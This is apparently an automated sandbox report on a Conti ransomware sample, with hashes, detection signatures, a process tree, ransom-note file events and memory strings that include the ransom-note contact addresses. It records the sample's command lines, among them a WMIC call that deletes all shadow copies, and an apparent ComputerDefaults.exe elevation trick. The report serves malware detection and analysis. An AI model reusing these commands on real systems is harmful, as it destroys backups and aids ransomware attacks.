Analysis Report 7906dc47_by_Libranalysis

Overview

General Information

Sample Name: 7906dc47_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 419877
MD5: 7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1: e7304e2436dc0eddddba229f1ec7145055030151
SHA256: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Detection

Conti
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found ransom note / readme
Multi AV Scanner detection for submitted file
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Yara detected Conti ransomware
Contains functionality to create processes via WMI
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Copying Sensitive Files with Credential Data
Sigma detected: Suspicious Svchost Process
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Shadow Copies Creation Using Operating Systems Utilities
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • 7906dc47_by_Libranalysis.exe (PID: 5008 cmdline: 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe' MD5: 7906DC475A8AE55FFB5AF7FD3AC8F10A)
    • sihost.exe (PID: 2952 cmdline: MD5: 6F84A5C939F9DA91F5946AF4EC6E2503)
      • cmd.exe (PID: 3764 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5376 cmdline: C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 5920 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 772 cmdline: C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • svchost.exe (PID: 2996 cmdline: MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • cmd.exe (PID: 1752 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6160 cmdline: C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 5468 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6248 cmdline: C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • svchost.exe (PID: 3020 cmdline: MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • cmd.exe (PID: 6540 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6612 cmdline: cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • taskhostw.exe (PID: 2736 cmdline: MD5: CE95E236FC9FE2D6F16C926C75B18BAF)
  • cmd.exe (PID: 1156 cmdline: cmd /c computerdefaults.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComputerDefaults.exe (PID: 6192 cmdline: computerdefaults.exe MD5: 1D494543B5C91E0EDD4C7C6C63EE25F0)
      • WMIC.exe (PID: 6440 cmdline: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 4084 cmdline: cmd /c computerdefaults.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComputerDefaults.exe (PID: 6276 cmdline: computerdefaults.exe MD5: 1D494543B5C91E0EDD4C7C6C63EE25F0)
      • WMIC.exe (PID: 6488 cmdline: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6380 cmdline: cmd /c computerdefaults.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComputerDefaults.exe (PID: 6508 cmdline: computerdefaults.exe MD5: 1D494543B5C91E0EDD4C7C6C63EE25F0)
  • cmd.exe (PID: 6412 cmdline: cmd /c computerdefaults.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ComputerDefaults.exe (PID: 6552 cmdline: computerdefaults.exe MD5: 1D494543B5C91E0EDD4C7C6C63EE25F0)

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: svchost.exe PID: 3020 | JoeSecurity_Conti_ransomware | Yara detected Conti ransomware | Joe Security |

    Sigma Overview

    System Summary:

    Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
    Source: Process started; Author: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: computerdefaults.exe, ParentImage: C:\Windows\System32\ComputerDefaults.exe, ParentProcessId: 6192, ProcessCommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', ProcessId: 6440
    Sigma detected: Copying Sensitive Files with Credential Data
    Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: computerdefaults.exe, ParentImage: C:\Windows\System32\ComputerDefaults.exe, ParentProcessId: 6192, ProcessCommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', ProcessId: 6440
    Sigma detected: Suspicious Svchost Process
    Source: Process started; Author: Florian Roth; Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe', ParentImage: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe, ParentProcessId: 5008, ProcessCommandLine: , ProcessId: 2996
    Sigma detected: Shadow Copies Creation Using Operating Systems Utilities
    Source: Process started; Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community; Data: Command: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: computerdefaults.exe, ParentImage: C:\Windows\System32\ComputerDefaults.exe, ParentProcessId: 6192, ProcessCommandLine: 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet', ProcessId: 6440
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process started; Author: vburov; Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe', ParentImage: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe, ParentProcessId: 5008, ProcessCommandLine: , ProcessId: 2996

    Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: 7906dc47_by_Libranalysis.exe, Virustotal: Detection: 42%
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe, File created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Desktop\GAOBCVIQIJ\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Desktop\IPKGELNTQY\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Desktop\LSBIHQFDVT\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Desktop\NEBFQQYWPS\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Desktop\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Documents\GAOBCVIQIJ\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Documents\IPKGELNTQY\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Documents\LSBIHQFDVT\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Documents\NEBFQQYWPS\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Documents\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\user\Downloads\readme.txt
    Source: C:\Windows\System32\sihost.exe, File created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\svchost.exe, File created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\taskhostw.exe, File created: C:\Users\Public\readme.txt
    Source: 7906dc47_by_Libranalysis.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe, Code function: 2_2_000001BB058206B2 FindFirstFileExW,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe, Code function: 2_2_000001BB058906B2 GlobalAlloc,FindFirstFileExW,
    Source: C:\Windows\System32\sihost.exe, Code function: 3_2_0000024D2C4106B2 FindFirstFileExW,
    Source: C:\Windows\System32\svchost.exe, Code function: 4_2_0000024843FF06B2 FindFirstFileExW,
    Source: C:\Windows\System32\svchost.exe, Code function: 11_2_0000020A025A06B2 FindFirstFileExW,
    Source: C:\Windows\System32\taskhostw.exe, Code function: 30_2_00000255F9EB06B2 FindFirstFileExW,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe, Code function: 2_2_000001BB0582016A CreateMutexW,GetVolumeInformationW,GetLogicalDriveStringsW,

    Networking:

    Found Tor onion address
    Source: readme.txt.3.dr, String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
    Source: readme.txt.3.dr, String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.boxgas.icu/eltalkfzj
    Source: readme.txt.3.dr, String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.jobsbig.cam/eltalkfzj
    Source: readme.txt.3.dr, String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.nowuser.casa/eltalkfzj
    Source: readme.txt.3.dr, String found in binary or memory: http://aec850e8ac806e10a87438b00eltalkfzj.sixsees.club/eltalkfzj
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=75&w=100&
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
    Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
    Source: taskhostw.exe, 0000001E.00000002.494972706.00000255F5867000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.c
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: http://www.msn.com
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
    Source: taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpU
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500649576.00000255F9F41000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp, svchost.exe, 00000004.00000000.235445986.0000024844045000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt
    Source: taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
    Source: taskhostw.exe, 0000001E.00000000.271595564.00000255F9DF8000.00000002.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
